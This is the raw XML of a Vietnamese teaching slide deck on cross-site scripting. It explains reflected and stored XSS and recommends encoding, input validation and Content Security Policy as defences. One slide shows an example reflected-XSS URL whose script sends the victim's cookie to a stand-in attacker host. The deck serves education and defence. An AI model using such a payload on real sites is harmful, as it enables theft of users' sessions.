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73" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="308" r:id="rId10"/>
    <p:sldId id="277" r:id="rId11"/>
    <p:sldId id="301" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="318" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="307" r:id="rId19"/>
    <p:sldId id="271" r:id="rId2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quy"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C6BACE70-8B62-4017-9885-8374119B87A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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6BACE70-8B62-4017-9885-8374119B87A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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6BACE70-8B62-4017-9885-8374119B87A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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6BACE70-8B62-4017-9885-8374119B87A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C6BACE70-8B62-4017-9885-8374119B87AF}"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5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6BACE70-8B62-4017-9885-8374119B87AF}"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7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6BACE70-8B62-4017-9885-8374119B87AF}" type="datetimeFigureOut">
              <a:rPr lang="vi-VN" smtClean="0"/>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C6BACE70-8B62-4017-9885-8374119B87AF}"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ACE70-8B62-4017-9885-8374119B87AF}" type="datetimeFigureOut">
              <a:rPr lang="vi-VN" smtClean="0"/>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C6BACE70-8B62-4017-9885-8374119B87AF}"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C6BACE70-8B62-4017-9885-8374119B87AF}"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792EE3-112C-428F-99CE-4427662C969C}"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ACE70-8B62-4017-9885-8374119B87AF}" type="datetimeFigureOut">
              <a:rPr lang="vi-VN" smtClean="0"/>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92EE3-112C-428F-99CE-4427662C969C}"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toidicodedao.com/2015/06/23/cach-tiep-can-1-ngon-ngucong-nghe-moi-phan-1/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://toidicodedao.com/2015/07/30/c-la-ngon-ngu-tuyet-voi-nhat-java-php-c-c-ruby-chi-toan-la-thu-re-tie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hyperlink" Target="https://toidicodedao.com/2015/09/17/tai-sao-gioi-lap-trinh-thu-ghet-internet-explor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14425" y="1858010"/>
            <a:ext cx="9595485" cy="5262245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• Thứ nhất, để khai thác Reflected XSS, hacker phải lừa được nạn nhân truy cập vào URL của mình. Còn Stored XSS không cần phải thực hiện việc này, sau khi chèn được mã nguy hiểm vào CSDL của ứng dụng, hacker chỉ việc ngồi chờ nạn nhân tự động truy cập vào. Với nạn nhân, việc này là hoàn toàn bình thường vì họ không hề hay biết dữ liệu mình truy cập đã bị nhiễm độc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378585" y="659130"/>
            <a:ext cx="9331325" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reflected XSS và Stored XSS có 2 sự khác biệt lớn trong quá trình tấn công</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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34745" y="1085215"/>
            <a:ext cx="9473565" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>• Thứ 2, mục tiêu của hacker sẽ dễ dàng đạt được hơn nếu tại thời điểm tấn công nạn nhân vẫn trong phiên làm việc(session) của ứng dụng web. Với Reflected XSS, hacker có thể thuyết phục hay lừa nạn nhân đăng nhập rồi truy cập đến URL mà hắn ta cung cấp để thực thi mã độc. Nhưng Stored XSS thì khác, vì mã độc đã được lưu trong CSDL Web nên bất cứ khi nào người dùng truy cập các chức năng liên quan thì mã độc sẽ được thực thi, và nhiều khả năng là những chức năng này yêu cầu phải xác thực(đăng nhập) trước nên hiển nhiên trong thời gian này người dùng vẫn đang trong phiên làm việc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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17980" y="1825625"/>
            <a:ext cx="8956040" cy="2245360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Từ những điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSS rất nhiều, đối tượng bị ảnh hưởng có thế là tất cả nhưng người sử dụng ứng dụng web đó. Và nếu nạn nhân có vai trò quản trị thì còn có nguy cơ bị chiếm quyền điều khiển web.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">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172" y="827315"/>
            <a:ext cx="7228114" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cách phòng tránh</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088571" y="2069201"/>
            <a:ext cx="4101737" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>1. Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088571" y="2972742"/>
            <a:ext cx="4119155" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>2. Validation/Sanitize</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3876040"/>
            <a:ext cx="5874385" cy="52197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3. CSP (Content Security Policy)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"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1704" y="818607"/>
            <a:ext cx="4493623" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654627" y="2551611"/>
            <a:ext cx="8595360" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Không được tin tưởng bất kì thứ gì người dùng nhập vào!! Hãy sử dụng hàm encode có sẵn trong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>ngôn ngữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t> để chuyển các kí tự &lt; &gt; thành &amp;lt; %gt;.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"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0880" y="853440"/>
            <a:ext cx="4720046" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validation/Sanitize</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1741714" y="2342605"/>
            <a:ext cx="8656320" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Một cách chống XSS khác là validation: loại bỏ hoàn toàn các kí tự khả nghi trong input của người dùng, hoặc thông báo lỗi nếu trong input có các kí tự này</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="28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0285" y="794195"/>
            <a:ext cx="6400800" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Content Security Policy)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881052" y="2499360"/>
            <a:ext cx="8499566" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Hiện tại, ta có thể dùng chuẩn CSP  để chống XSS. Với CSP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>trình duyệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t> chỉ chạy JavaScript từ những domain được chỉ định</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="28350"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880870" y="4340225"/>
            <a:ext cx="8550275" cy="15354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4245" y="1612265"/>
            <a:ext cx="10304145" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Cách để test xem những website có thể bị tấn công xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3813175" y="4575175"/>
            <a:ext cx="8794115" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Mời các bạn xem video sau</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">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7794" y="748937"/>
            <a:ext cx="5860869" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lời kết</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584960" y="2194560"/>
            <a:ext cx="9344297" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>XSS là một lỗi rất cơ bản, hầu như hacker nào cũng biết. Trang web bị lỗi này rất dễ thành mồi ngon cho hacker. Do vậy, các bạn developer nhớ cẩn thận, đừng để web của mình bị dính lỗi này</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"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544" y="1464037"/>
            <a:ext cx="5913120" cy="4399915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Cross-site scripting là một lỗ hổng phổ biến trong ứng dụng web. Để khai thác một lỗ hổng XSS, hacker sẽ chèn mã độc thông qua các đoạn script để thực thi chúng ở phía client. Thông thường, các cuộc tấn công XSS được sử dụng để vượt qua các kiểm soát truy cập và mạo danh người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800"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20460" y="1372235"/>
            <a:ext cx="5877560" cy="4916170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300730" y="256540"/>
            <a:ext cx="4642485" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Giới thiệu về XSS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4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XSS-type.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2090420" y="852170"/>
            <a:ext cx="8010525" cy="5153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1908" y="991326"/>
            <a:ext cx="3805646" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145540" y="2672715"/>
            <a:ext cx="10144125" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Reflected XSS là hình thức tấn công được sử dụng nhiều nhất. Đây là nơi mã script độc hại đến từ HTTP request. Từ đó, hacker đánh cắp dữ liệu của người dùng, chiếm quyền truy cập và hoạt động của họ trên website thông qua việc chia sẻ URL chứa mã độc. Hình thức này thường nhắm đến ít nạn nhâ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="vi-VN"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22655" y="1501140"/>
            <a:ext cx="10072370" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>http://example.com/name=var+i=new+Image;+i.src=”http://www.haxxed.com/?cookie=document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="screenshot_1676278986"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002155" y="2255520"/>
            <a:ext cx="7741920" cy="3848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2148" y="697230"/>
            <a:ext cx="10058400" cy="531209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1774" y="414048"/>
            <a:ext cx="3105785" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="4000" b="1" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134110" y="1985010"/>
            <a:ext cx="10126345" cy="3969385"/>
          </a:xfrm>
